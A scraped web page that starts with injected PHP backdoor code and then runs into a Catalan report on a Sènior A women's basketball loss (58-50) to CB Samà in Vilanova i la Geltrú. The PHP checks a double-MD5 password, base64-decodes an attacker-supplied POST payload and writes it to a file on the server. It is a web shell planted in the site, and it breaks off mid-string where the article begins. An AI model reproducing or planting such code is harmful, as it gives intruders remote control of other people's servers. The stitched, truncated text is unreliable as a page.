function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Derrota dura contra Samà a Vilanova i la Geltrú! (58-50) -

Derrota dura contra Samà a Vilanova i la Geltrú! (58-50)

Updated: febrer 25, 2023

Partit corresponent a la jornada 17 on el Sènior A ha visitat la complicada pista del CB Samà de Vilanova i la Geltrú i no ha pogut sumar la victòria en un mal partit de les liles contra un rival molt proper a la classificació (58-50). Així doncs, l’equip ara suma un total de 8 victòries i 9 derrotes.

El duel ha començat amb un contundent parcial favorable al conjunt local (11-0), però a partir d’aquí l’equip tarragoní ha anat entrat de mica en mica al partit a partir de la bona defensa arribant al descans nou punts per sota a l’electrònic (32-23) competint el duel.

A partir del 3r quart el TGN a través de respectar les premisses defensives del cos tècnic, i començar a limitar el joc ofensiu del Samà, però el gran nombre de pilotes perdudes en atac de les liles no permetien posar-se per sobre al marcador. Ja en el darrer quart, a través d’un parell de tripes, l’equip s’ha posat a dos punts, però immersos en la mala dinàmica i en el gran nombre de lesions l’equip no ha pogut sumar una important victòria a domicili contra un rival directe.

Així doncs, derrota dura del Sènior ‘A’. El proper rival serà dissabte vinent a les 19.30h contra l’actual líder de la lliga; el Camping Bianya Roser al Sagrat Cor, us necessitem afició!

Derrota dura contra un rival que teníem ben estudiat i ben treballat i sabíem perfectament el que ens faria i ens ho ha fet.– Marc Rovirosa